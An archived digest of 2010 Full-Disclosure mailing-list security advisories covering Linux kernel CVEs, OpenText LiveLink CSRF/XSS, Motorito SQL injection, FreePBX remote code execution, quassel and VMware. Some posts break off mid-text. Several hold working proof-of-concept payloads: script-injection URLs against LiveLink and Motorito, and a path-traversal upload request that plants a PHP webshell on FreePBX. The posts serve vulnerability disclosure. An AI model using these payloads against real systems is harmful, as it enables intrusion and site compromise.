[Full-disclosure] [ MDVSA-2010:188 ] kernel
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:188 http://www.mandriva.com/security/ ___ Package : kernel Date: September 23, 2010 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: fs/namei.c in Linux kernel 2.6.18 through 2.6.34 does not always follow NFS automount symlinks, which allows attackers to have an unknown impact, related to LOOKUP_FOLLOW. (CVE-2010-1088) The tc_fill_tclass function in net/sched/sch_api.c in the tc subsystem in the Linux kernel 2.4.x before 2.4.37.6 and 2.6.x before 2.6.31-rc9 does not initialize certain (1) tcm__pad1 and (2) tcm__pad2 structure members, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors. (CVE-2009-3228) The do_pages_move function in mm/migrate.c in the Linux kernel before 2.6.33-rc7 does not validate node values, which allows local users to read arbitrary kernel memory locations, cause a denial of service (OOPS), and possibly have unspecified other impact by specifying a node that is not part of the kernel node set. (CVE-2010-0415) The ATI Rage 128 (aka r128) driver in the Linux kernel before 2.6.31-git11 does not properly verify Concurrent Command Engine (CCE) state initialization, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly gain privileges via unspecified ioctl calls. (CVE-2009-3620) The wake_futex_pi function in kernel/futex.c in the Linux kernel before 2.6.33-rc7 does not properly handle certain unlock operations for a Priority Inheritance (PI) futex, which allows local users to cause a denial of service (OOPS) and possibly have unspecified other impact via vectors involving modification of the futex value from user space. (CVE-2010-0622) The kvm_arch_vcpu_ioctl_set_sregs function in the KVM in Linux kernel 2.6 before 2.6.30, when running on x86 systems, does not validate the page table root in a KVM_SET_SREGS call, which allows local users to cause a denial of service (crash or hang) via a crafted cr3 value, which triggers a NULL pointer dereference in the gfn_to_rmap function. (CVE-2009-2287) The handle_dr function in arch/x86/kvm/vmx.c in the KVM subsystem in the Linux kernel before 2.6.31.1 does not properly verify the Current Privilege Level (CPL) before accessing a debug register, which allows guest OS users to cause a denial of service (trap) on the host OS via a crafted application. (CVE-2009-3722) The ext4_decode_error function in fs/ext4/super.c in the ext4 filesystem in the Linux kernel before 2.6.32 allows user-assisted remote attackers to cause a denial of service (NULL pointer dereference), and possibly have unspecified other impact, via a crafted read-only filesystem that lacks a journal. (CVE-2009-4308) The eisa_eeprom_read function in the parisc isa-eeprom component (drivers/parisc/eisa_eeprom.c) in the Linux kernel before 2.6.31-rc6 allows local users to access restricted memory via a negative ppos argument, which bypasses a check that assumes that ppos is positive and causes an out-of-bounds read in the readb function. (CVE-2009-2846) Multiple buffer overflows in fs/nfsd/nfs4xdr.c in the XDR implementation in the NFS server in the Linux kernel before 2.6.34-rc6 allow remote attackers to cause a denial of service (panic) or possibly execute arbitrary code via a crafted NFSv4 compound WRITE request, related to the read_buf and nfsd4_decode_compound functions. (CVE-2010-2521) mm/shmem.c in the Linux kernel before 2.6.28-rc8, when strict overcommit is enabled and CONFIG_SECURITY is disabled, does not properly handle the export of shmemfs objects by knfsd, which allows attackers to cause a denial of service (NULL pointer dereference and knfsd crash) or possibly have unspecified other impact via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-1643. (CVE-2008-7256) The release_one_tty function in drivers/char/tty_io.c in the Linux kernel before 2.6.34-rc4 omits certain required calls to the put_pid function, which has unspecified impact and local attack vectors. (CVE-2010-1162) mm/shmem.c in the Linux kernel before 2.6.28-rc3, when strict overcommit is enabled, does not properly handle the export of shmemfs objects by knfsd, which allows attackers to cause a denial of service (NULL pointer dereference and knfsd crash) or possibly have unspecified other impact via unknown vectors. (CVE-2010-1643) The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the Linux kernel 2.6.33.3 and earlier, when SCTP i
[Full-disclosure] OpenText LiveLink 9.7.1 multiple vulnerabilities (CSRF, XSS)
# Exploit Title: OpenText LiveLink multiple vulnerabilities (CSRF, XSS)
# Date: 22/06/2010
# Author: Alejandro Ramos
# http://www.securitybydefault.com
# Software Link: http://www.opentext.com/
# Version: 9.7.1
# Tested on: Solaris
Opentext (NASDAQ OTEX) LiveLink 9.7.1
Livelink features several advanced foundational elements that allow
organizations to
apidly and easily enable advanced content management applications and solutions
throughout the enterprise.
CSRF:
Livelink ECM is prone to a cross-site request forgery vulnerability
because it fails
to properly sanitize data input.
An attacker may leverage this issue to change permissions of folders
or resources.
1.- POST Request:
https://host/func=ll&objAction=EditAcl2&objType=1&objID=514&nodeId=3083071&id=14&rightId=14&PermType=0&Root=&nextUrl2=&PermActionType=&See=on&SeeContent=on&Modify=on&EditAttr=on&Reserve=on&DeleteVersion=on&Delete=on&EditPerm=on
XSS:
Livelink ECM is prone to a cross-site scripting vulnerability because it fails
to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This may
help the attacker steal cookie-based authentication credentials and
launch other attacks.
1.- parameter: viewType
https://host/livelink/livelink?func=ll&objId=514&objAction=browse&viewType=aa";>alert(514)https://host/livelinkdav/nodes/OOB_DAVWindow.html?func=oobget&nodeid=514&support=/livelinksupport/&setctx=');alert('XSS');//514--idctx-12&ctxval=blahblah
5.- POST Request.-
https://host/livelink/livelink?func=ll.processAccept&objId=514&webDAVCacheID=1&cacheID=1&sysCacheID=0&nextUrl=/livelink/livelink%3Ffunc%3Dll%26objID%3D514%26objAction%3Dbrowse%26viewType%3D21
6.- parameter: sort
https://host/livelink/livelink?func=ll&objid=1&objAction=browse&sort=%22%3E%3Cscript%3Ealert%28514%29%3C/script%3E%3Cimg%20src=%22
--
Alejandro Ramos
http://www.securitybydefault.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ISecAuditors Security Advisories] SQL Injection and XSS in Motorito < v2.0 Ni 483
= INTERNET SECURITY AUDITORS ALERT 2010-005 - Original release date: March 30th, 2010 - Last revised: September 23th, 2010 - Discovered by: Mario Diaz Caldera - Severity: 5.5/10 (CVSS Base Score) = I. VULNERABILITY - SQL Injection and XSS in Motorito < v2.0 Ni 483 II. BACKGROUND - Motorito is an on-line marketing tool. It is used to manage the contents of Web Site, create new content, decide which news to put on the cover, update product catalog, manage the areas of promotion, manage users, edit the menu items, layout, send e-mails, etc. III. DESCRIPTION - This bug was found using CENTOS and the last release of Motorito with Apache 2.2.3 and PHP 5.1.6. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application, and it is possible to check that the variables of the module index.php are not properly filtered. IV. PROOF OF CONCEPT - GET /?mmod=>"'>alert(4135)&file=>"'>alert(4135) HTTP/1.0 Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: www.testhostwithmotorito.es Referer: http://www.testhostwithmotorito.es/ HTTP/1.1 200 OK Content-Length: 361 Date: Fri, 05 Feb 2010 08:53:16 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Database error: Invalid SQL: SELECT parentID FROM sis_menus WHERE module='>"'>alert(4135)' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '>alert(4135)'' at line 1) Session halted. V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Motorito < v2.0 Ni 483 VII. SOLUTION - Upgrade to next version of Motorito. It can be obtained from http://www.motorito.com Current version (at advisory publication 2.0 - Ni 891). VIII. REFERENCES - http://www.motorito.com http://www.isecauditors.com IX. CREDITS - This vulnerability has been discovered by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com). X. REVISION HISTORY - March 30, 2010: Initial release XI. DISCLOSURE TIMELINE - February22, 2010: Discovered by Internet Security Auditors. June14, 2010: Sent to the vendor. Response about revision and inclusion in Project Plan. September 23, 2010: Request for update. Response about correction. September 23, 2010: Sent to public lists. XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT - Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Teamspeak default passwords?
Is there a problem with default password assignment with a piece of software called TeamSpeak? I have script kiddies trying to access my SSH server with logins 'ts', 'tss', 'ts1' and 'teamspeak'. This has only started up in the last few days. -- Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TWSL2010-005: FreePBX recordings interface allows remote code execution
Trustwave's SpiderLabs Security Advisory TWSL2010-005:
FreePBX recordings interface allows remote code execution
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
Published: 2010-09-23
Version: 1.0
Vendor: FreePBX (http://www.freepbx.org/)
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
Version(s) affected: 2.8.0 and below
Product Description:
FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of
volunteers,has been downloaded over 5,000,000 times, and is utilized in an
estimated 500,000 active phone systems.
Source: http://www.freepbx.org
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-3490
Finding:
The configuration interface for FreePBX is prone to a remote arbitrary code
execution on the system recordings menu. FreePBX doesn't handle file uploads
in a secure manner, allowing an attacker to manipulate the file extension
and the beginning of the uploaded file name.
The piece of code below, found in page.recordings.php, illustrates part of
the recordings upload feature.
/* Code removed to fit better on advisory */
"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>
/* Code removed to fit better on advisory */
When a file is uploaded, a copy is saved temporarily under the /tmp/
directory, where the name of the file is composed of
user-controlled-staticname.extension, where:
"user-controlled" is $usersnum variable.
"staticname" value is -ivrrecording.
"extension" is controlled by the user.
If $usersnum variable is not defined, then a static string (unnumbered)
is used.
Finally, when the user clicks on the save button on the System Recordings
interface, the file is saved with the original file name provided by the
user under the /var/lib/asterisk/sounds/custom/ directory.
When uploading a file, an attacker can manipulate the $usersnum variable to
perform a path traversal attack and save it anyplace that the web server
user has access, for example the Apache's DocumentRoot. This allows an
attacker to upload malicious code to the web server and execute it under the
webserver's access permissions.
The HTTP request below illustrates the upload of a phpshell.
POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---5991806838789183981588991120
Content-Length: 116089
-5991806838789183981588991120
Content-Disposition: form-data; name="display"
recordings
-5991806838789183981588991120
Content-Disposition: form-data; name="action"
recordings_start
-5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"
../../../../../var/www/html/admin/SpiderLabs
-5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream
-5991806838789183981588991120--
To access the webshell in this example, an attacker would use
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php
Maintainer Response:
The maintainer has released a patch to address this issue for all versions
of the software 2.3 and newer.
Details of the patch can be found here:
http://www.freepbx.org/trac/ticket/4553
Remediation Steps:
Install the maintainer-provided patch.
Vendor Communication Timeline:
08/13/10 - Initial contact
08/18/10 - Vulnerability disclosed
09/16/10 - Initial fix proposed by maintainer
09/22/10 - Fix reviewed, improved, and released by maintainer
09/23/10 - Advisory public release
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized ret
[Full-disclosure] [USN-991-1] quassel vulnerability
=== Ubuntu Security Notice USN-991-1 September 23, 2010 quassel vulnerability https://launchpad.net/bugs/629774 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: quassel 0.4.1-0ubuntu3.1 quassel-core0.4.1-0ubuntu3.1 Ubuntu 9.10: quassel 0.5.0-0ubuntu1.2 quassel-core0.5.0-0ubuntu1.2 Ubuntu 10.04 LTS: quassel 0.6.1-0ubuntu1.1 quassel-core0.6.1-0ubuntu1.1 After a standard system update you need to restart quassel or quasselcore to make all the necessary changes. Details follow: Jima discovered that quassel would respond to a single privmsg containing multiple CTCP requests with multiple NOTICEs, possibly resulting in a denial of service against the IRC connection. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1.diff.gz Size/MD5:14652 af43ed7a72ffa090d37c2d0d00702078 http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1.dsc Size/MD5: 1963 5ae8d0ff60b5b06b895bb9ae171d5245 http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.4.1.orig.tar.gz Size/MD5: 3387386 ad02d180d013e4e802405bc0d4fbc92f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel-data_0.4.1-0ubuntu3.1_all.deb Size/MD5: 473278 ed6d2d9ce47958e33c22d53eeb130eb1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1_amd64.deb Size/MD5: 19585188 055a31fd179133cea112d8ade393af00 http://security.ubuntu.com/ubuntu/pool/universe/q/quassel/quassel-client_0.4.1-0ubuntu3.1_amd64.deb Size/MD5: 16123196 4768b70faa56de99a58887eba390df0f http://security.ubuntu.com/ubuntu/pool/universe/q/quassel/quassel-core_0.4.1-0ubuntu3.1_amd64.deb Size/MD5: 5329522 59c6d37437fe451c63a57ac97e16a73e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1_i386.deb Size/MD5: 19364706 5accb85ff4b7650cef63ea278d68240c http://security.ubuntu.com/ubuntu/pool/universe/q/quassel/quassel-client_0.4.1-0ubuntu3.1_i386.deb Size/MD5: 15952248 61e3e2a169bd98c1ddb4e281f658588e http://security.ubuntu.com/ubuntu/pool/universe/q/quassel/quassel-core_0.4.1-0ubuntu3.1_i386.deb Size/MD5: 5235750 6312c44c3bf5bac1db19898f335a607e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1_lpia.deb Size/MD5: 19463224 baa50d79d8a62f81c6864a5db776e7eb http://ports.ubuntu.com/pool/universe/q/quassel/quassel-client_0.4.1-0ubuntu3.1_lpia.deb Size/MD5: 16028358 88bc16020301f4bfc678737932d3b199 http://ports.ubuntu.com/pool/universe/q/quassel/quassel-core_0.4.1-0ubuntu3.1_lpia.deb Size/MD5: 5263036 aca976fd07ee5ff6dbb3ee73267781c1 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1_powerpc.deb Size/MD5: 20086318 f5e0299a1d9419a08955f4706768f15d http://ports.ubuntu.com/pool/universe/q/quassel/quassel-client_0.4.1-0ubuntu3.1_powerpc.deb Size/MD5: 16547258 91262f19d6d83196f7124b90e5d331a7 http://ports.ubuntu.com/pool/universe/q/quassel/quassel-core_0.4.1-0ubuntu3.1_powerpc.deb Size/MD5: 5444286 7628daecf48ef865fc46fee187b89815 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/q/quassel/quassel_0.4.1-0ubuntu3.1_sparc.deb Size/MD5: 901540 b050e39630f12db8759a6d0071501b6a http://ports.ubuntu.com/pool/universe/q/quassel/quassel-client_0.4.1-0ubuntu3.1_sparc.deb Size/MD5: 748492 5d3f95e15324a98ffe371154c7846681 http://ports.ubuntu.com/pool/universe/q/quassel/quassel-core_0.4.1-0ubuntu3.1_sparc.deb Size/MD5: 286256 1451beeb70db724cab56ccc61b188600 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.5.0-0ubuntu1.2.diff.gz Size/MD5:17877 a7e04cda3cc45e3409eb57a4ea20148c http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.5.0-0ubuntu1.2.dsc Size/MD5: 1991 6ff013a9b19d1d76b87817da84d37687 http://security.ubuntu.com/ubuntu/pool/main/q/quassel/quassel_0.5.0.orig.tar.gz Size/MD5: 3708203 24e2733475557ba9641d83a74442a329 Architecture independent packages: http://security.ubuntu.com/ubun
[Full-disclosure] VMSA-2010-0014 VMware Workstation, Player, and ACE address several security issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0014 Synopsis: VMware Workstation, Player, and ACE address several security issues. Issue date:2010-09-23 Updated on:2010-09-23 (initial release of advisory) CVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205 CVE-2010-2249 CVE-2010-0434 CVE-2010-0425 - 1. Summary VMware Workstation and Player address a potential installer security issue and security issues in libpng. VMware ACE Management Server (AMS) for Windows updates Apache httpd. 2. Relevant releases VMware Workstation 7.1.1 and earlier, VMware Player 3.1.1 and earlier, VMware ACE Management Server 2.7.1 and earlier, Note: VMware Server was declared End Of Availability on January 2010, support will be limited to Technical Guidance for the duration of the support term. 3. Problem Description a. VMware Workstation and Player installer security issue The Workstation 7.x and Player 3.x installers will load an index.htm file located in the current working directory on which Workstation 7.x or Player 3.x is being installed. This may allow an attacker to display a malicious file if they manage to get their file onto the system prior to installation. The issue can only be exploited at the time that Workstation 7.x or Player 3.x is being installed. Installed versions of Workstation and Player are not affected. The security issue is no longer present in the installer of the new versions of Workstation 7.x and Player 3.x (see table below for the version numbers). The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-3277 to this issue. VMware would like to thank Alexander Trofimov and Marc Esher for independently reporting this issue to VMware. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected Workstation7.x any 7.1.2 build 301548 or later * Workstation6.5.x any not affected Player 3.x any 3.1.2 build 301548 or later * Player 2.5.x any not affected AMSany any not affected Server any any not affected Fusion any Mac OS/X not affected ESXi any ESXi not affected ESXany ESX not affected * Note: This only affects the installer, if you have a version of Workstation or Player installed you are not vulnerable. b. Third party libpng updated to version 1.2.44 A buffer overflow condition in libpng is addressed that could potentially lead to code execution with the privileges of the application using libpng. Two potential denial of service issues are also addressed in the update. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249 to these issues. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected Workstation7.1.x any 7.1.2 build 301548 or later Workstation6.5.x any affected, patch pending Player 3.1.x any 3.1.2 build 301548 or later Player 2.5.x any affected, patch pending AMSany any not affected Server any any affected, no patch planned Fusion any Mac OS/X not affected ESXi any ESXi not affected ESXany ESX not affected c. VMware ACE Management Server (AMS) for Windows updates Apache httpd version 2.2.15. A function in Apache HTTP Server when multithreaded MPM is used does not properly handle headers in subrequests in certain circumstances which may allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request. The Apache mod_isapi module can be forced to unload a specific library before the processing of a request is complete, resulting in memory corruption. This vulnerability may allow a remote a
